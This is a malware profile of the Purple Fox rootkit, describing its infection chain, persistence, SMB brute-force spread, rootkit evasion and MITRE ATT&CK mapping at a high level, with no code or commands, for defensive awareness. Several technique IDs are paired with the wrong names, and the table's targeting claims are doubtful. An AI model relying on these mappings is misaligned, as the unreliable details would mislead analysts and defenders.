Purple Fox | |
Type of Malware | Rootkit |
Country of Origin | China |
Date of initial activity | 2018 |
Targeted Countries | Ukraine |
Addittional Names | DirtyMoe |
Associated Groups | Unknown |
Motivation | Cyberwarfare |
Attack Vectors | Phishing |
Targeted Systems | Windows |
Overview
Purple Fox, a sophisticated malware first discovered in March 2018, has recently undergone a significant transformation, enhancing its threat profile with advanced propagation techniques. Originally known for exploiting vulnerabilities in Internet Explorer and Windows systems through exploit kits, Purple Fox has evolved beyond its initial methods, showcasing a new and more dangerous capability.
The malware now utilizes compromised servers running outdated versions of Microsoft IIS and FTP services to deliver its initial payloads. Once a system is infected, Purple Fox deploys a sophisticated rootkit to conceal its presence, making it exceptionally difficult to detect and remove. This rootkit, based on an open-source project, enables the malware to hide critical system components and maintain a low profile, further complicating remediation efforts.
Targets
Enterprise and Government: Organizations with exposed Windows servers, especially those using outdated software or with weak security practices, are at risk. This includes various sectors such as finance, healthcare, and government institutions.
Small and Medium Businesses (SMBs): Businesses with insufficient cybersecurity measures or outdated systems can also be targeted. These entities are often less likely to have robust security defenses in place.
Educational Institutions: Schools and universities with vulnerable systems can be targeted, especially those with internet-facing servers that may be poorly secured.
Individual Users: Individuals using Windows machines with weak passwords or outdated software are also potential targets.
How they operate
Initial Infection and Distribution
Purple Fox’s infection vector has evolved over time. Initially, the malware was spread through exploit kits targeting vulnerabilities in Internet Explorer and Windows systems. However, recent variants have shifted to exploiting weak passwords and vulnerabilities in internet-facing Windows machines via SMB (Server Message Block) brute force attacks. Once a vulnerable machine is identified, Purple Fox deploys its payload through compromised servers running outdated versions of Microsoft IIS and FTP services. These servers host MSI (Microsoft Installer) packages that masquerade as legitimate software updates, tricking users into executing them.
Execution and Installation
Upon execution, the MSI installer deploys multiple components of Purple Fox. The installation process involves extracting and decrypting payloads, which include both 64-bit and 32-bit DLL files, and an encrypted rootkit. The rootkit, based on an open-source project, is designed to hide the malware’s presence by obfuscating files, registry entries, and system processes. The installer also modifies Windows Firewall settings using netsh commands to block specific ports and prevent reinfection or interference from other threat actors. Additionally, an IPv6 interface is installed to facilitate network scanning and propagation.
Persistence and Propagation
To ensure persistence, Purple Fox creates a new system service with a name matching a specific regex pattern (e.g., AC01, AC02) that maintains a presence on the infected machine. This service runs a command loop that iterates through URLs containing the MSI installer, ensuring continuous infection of new targets. The malware also employs lateral movement techniques, using port scanners to identify and exploit other vulnerable systems on the network. Brute force tools are utilized to guess SMB passwords, allowing the malware to spread across networked machines.
Defense Evasion and Impact
Purple Fox employs several strategies to evade detection and maintain its foothold. The rootkit component plays a crucial role in hiding the malware’s presence from security tools and system administrators. By leveraging netsh commands to configure firewall rules and block network traffic on specific ports, the malware minimizes the risk of detection and removal. The use of obfuscated MSI installers and the integration of advanced rootkit techniques further complicate the detection and remediation efforts.
MITRE Tactics and Techniques
Initial Access
Phishing (T1566): Purple Fox has been distributed through phishing emails containing malicious attachments or links.
Exploitation of Public-Facing Applications (T1190): Early variants exploited vulnerabilities in Internet Explorer and Windows systems.
Execution
Command-Line Interface (T1059): Uses command-line tools such as netsh for network configuration and firewall manipulation.
MSI Installer (T1203): The malware uses MSI installer packages to deploy its payloads, often masquerading as legitimate software updates.
Persistence
Create or Modify System Process (T1543): Implements persistence by creating or modifying system services to ensure continued execution.
Registry Run Keys / Startup Folder (T1547): Modifies registry entries to ensure the malware executes on system startup.
Privilege Escalation
Exploitation for Privilege Escalation (T1068): Uses vulnerabilities to gain elevated privileges on the infected system.
Defense Evasion
Rootkit (T1014): Integrates a rootkit to hide its presence from security tools and system administrators.
Network Layer Protocol (T1040): Utilizes netsh commands to configure firewall rules and block certain network traffic to avoid detection and removal.
Discovery
Network Service Scanning (T1046): Employs port scanning to identify and exploit vulnerable machines on the network.
Lateral Movement
Remote File Copy (T1105): Moves laterally across the network by copying itself to other machines.
Brute Force (T1110): Uses brute force techniques to guess SMB passwords and gain access to other systems.
Impact
Data Obfuscation (T1070): Uses various techniques to obscure its activities and avoid detection.
